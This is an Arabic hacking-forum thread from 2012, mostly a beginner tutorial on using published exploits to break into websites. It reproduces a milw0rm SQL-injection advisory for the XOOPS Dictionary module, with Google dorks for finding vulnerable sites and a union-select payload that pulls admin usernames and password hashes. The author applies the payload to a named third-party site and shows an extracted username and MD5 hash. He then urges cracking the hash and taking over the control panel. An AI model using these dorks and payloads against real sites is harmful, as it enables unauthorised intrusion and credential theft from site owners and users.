Pirate Grave

Would you like to react to this message? Create an account in a few clicks or log in to continue.
Pirate Grave

We Are Ready To Die


3 posters

    تعلم قراءة الثغرات وأختراق المواقع والمنتديات(ادخل مبتدء وأطلع مبدع) ‏

    s.t.a.r.s
    s.t.a.r.s
    PIRATE GRAVE TEAM
    PIRATE GRAVE TEAM


    Male عدد المساهمات : 55
    نقاط : 122
    السٌّمعَة : 0
    تاريخ التسجيل : 2011-07-04
    العمر : 27

    بطاقة الشخصية
    الخيارات: 1000000

    تعلم قراءة الثغرات وأختراق المواقع والمنتديات(ادخل مبتدء وأطلع مبدع) ‏ Empty تعلم قراءة الثغرات وأختراق المواقع والمنتديات(ادخل مبتدء وأطلع مبدع) ‏

    Post by s.t.a.r.s Sat Jan 07, 2012 7:01 am

    بسم الله الرحمن الرحيم
    هذا الدرس يـ اخوان الى المبتدئين
    يعني المحترفين ما راح يحتاجو الى هذا الدرس
    هذا الدرس فقط يساعدك في فهم ومعرفة الثغرات المكتوبه وطريقة الإستفاده منها
    الان

    حط رد على شان تشــوف الموضوع

    [hide]
    نروح الى احد مواقع الثغرات الكثيره
    وانا اخترت الميل ورم لانه اسهل واحد
    نفتح الصفحة الرئيسيه للموقع
    milw0rm - exploits : vulnerabilities : videos : papers : shellcode
    الي يهمنا في هذي الصفحة هو اختراق المواقع بما ان حنى مبتدئين
    الا هي
    ثالث خيار

    الي لونهم بـ الاصفر
    هذول جدد بـ تاريخ اليوم
    والي لونهم اخضر يعني اقدم
    وطبعا التاريخ مكتوب على جنب
    انا بختار وحدة من الثغرات الموجوده
    و اخترت هذي الثغره
    XOOPS Module Dictionary <= 0.94 Remote SQL Injection Vulnerability
    مكتوب فيها كـ التالي
    كود:

    ##########################################
    #
    # XOOPS Module dictionary(0.94-0.91-0.70)SQL Injection
    #
    ##########################################
    #
    ##AUTHOR : S@BUN
    #
    ####HOME : milw0rm - S@BUN
    #
    ####MAİL : hackturkiye.hackturkiye@gmail.com
    #
    ###########################################
    #
    # DORK 1 : allinurl: "modules/dictionary"
    #
    # DORK 2 : allinurl: "modules/dictionary/print.php?id"
    #
    ###########################################
    EXPLOIT :

    modules/dictionary/print.php?id=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),concat(uname,0x3a,pass)/**/from/**/xoops_users/*
    ###########################################
    Dictionary Version 0.94 by nagl.ch
    Dictionary Version 0.91 by nagl.ch
    Dictionary Version 0.70 by nagl.ch
    ###########################################
    ##################S@BUN####################
    ###########################################
    #####hackturkiye.hackturkiye@gmail.com#####
    ###########################################

    # milw0rm.com [2008-03-17]

    طيب نشرح شوي شوي
    الجزاء الاول


    كود:

    XOOPS Module dictionary(0.94-0.91-0.70)SQL Injection


    هذي معلومات عن الثغره
    نوعيتها و وين الثغره موجوده و في اي اصدار
    طيب
    الثغره هذي في سكريبت اسمه XOOPS
    وهذي مجله طبعا
    على اية حال الثغره في dictionary
    الا هو الدليل
    والاصدارات هي
    0.94-0.91-0.70
    والبيانات الي بتجي هذي غير مهمه بـ النسبه لنا
    وهي معلومات عن مكتشف الثغره

    كود:

    #
    ##AUTHOR : S@BUN
    #
    ####HOME : milw0rm - S@BUN
    #
    ####MAİL : hackturkiye.hackturkiye@gmail.com
    #

    ###########################################
    والان اهم جزئين
    الجزاء الاول الدورك

    ###########################################
    كود:

    #
    # DORK 1 : allinurl: "modules/dictionary"
    #
    # DORK 2 : allinurl: "modules/dictionary/print.php?id"
    #

    شنو هذا الدورك
    هذي الكلمه الي راح تحطها في كلمة البحث عشان تجيب لك المواقع المصابه بـ الثغره
    فـ لو كتبت في قوقل

    كود:

    allinurl: "modules/dictionary"

    راح يطلع لك كل المواقع الي موجود فيها هذا
    على اية حال
    نختار موقع من المواقع
    وانا اخترت

    كود:

    Southwestern Pennsylvania League of Apparition Technologists - Dictionary

    نروح الى الجزاء الثاني المهم
    الا وهو

    كود:

    ###########################################
    EXPLOIT :

    modules/dictionary/print.php?id=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),concat(uname,0x3a,pass)/**/from/**/xoops_users/*
    ###########################################

    وهذا كود الإستغلال
    يعني راح ننسخ هذا الكود ونحطه في الموقع الي اخترناه
    وراح يصير رابط الموقع مع الاستغلال كذا
    كود:

    Southwestern Pennsylvania League of Apparition Technologists

    /*
    فورا راح يطلع لنا اليوزر والباسوورد لمدير الموقع
    طبعا الموضوع ما ينتهي هنا
    الباسوورد مشفر بـ الـ MD5
    والـ MD5 هذا نوع من انوع التشفير وهو نوعا ما
    لكن البرامج ما قصرت و تقدرو بـ اي برنامج فك باسووردات MD5 انكم تفكو الهاش الي يطلع لكم
    على اية حال الان الباسوورد طلع لنا مشفر مع الاسم
    يعني الباسوورد مشفر والاسم موجود جنبه
    وهم كذا
    ARC-753: a19010808cc277ac5cc50548d7a61e8e
    الي بـ الون الاحمر هذا الباسوورد المشفر
    والي بـ الازرق هذا اسم مدير الموقع الي راح تدخل به لوحة التحكم بعد ما تفك التشفير
    النقطتين الرئسيتين فقط لتفريق بينهم
    بعد ما تفك باسوورد الموقع
    تدخل لوحة تحكم الموقع وتسوي الي يعجبك
    by:s.t.a.r.s
    avatar
    ameer morany
    عضو جديد


    Male عدد المساهمات : 1
    نقاط : 1
    السٌّمعَة : 0
    تاريخ التسجيل : 2012-05-09
    العمر : 37

    تعلم قراءة الثغرات وأختراق المواقع والمنتديات(ادخل مبتدء وأطلع مبدع) ‏ Empty Re: تعلم قراءة الثغرات وأختراق المواقع والمنتديات(ادخل مبتدء وأطلع مبدع) ‏

    Post by ameer morany Wed May 09, 2012 7:42 am

    مشكوور غالي cheers
    avatar
    عبدهش
    عضو جديد


    Male عدد المساهمات : 1
    نقاط : 1
    السٌّمعَة : 0
    تاريخ التسجيل : 2012-10-01
    العمر : 38

    تعلم قراءة الثغرات وأختراق المواقع والمنتديات(ادخل مبتدء وأطلع مبدع) ‏ Empty Re: تعلم قراءة الثغرات وأختراق المواقع والمنتديات(ادخل مبتدء وأطلع مبدع) ‏

    Post by عبدهش Mon Oct 01, 2012 2:08 pm

    زفت يغالى مش فاهم حاجه بس تسلــــــــــــــــم

      Current date/time is Fri Nov 22, 2024 7:09 pm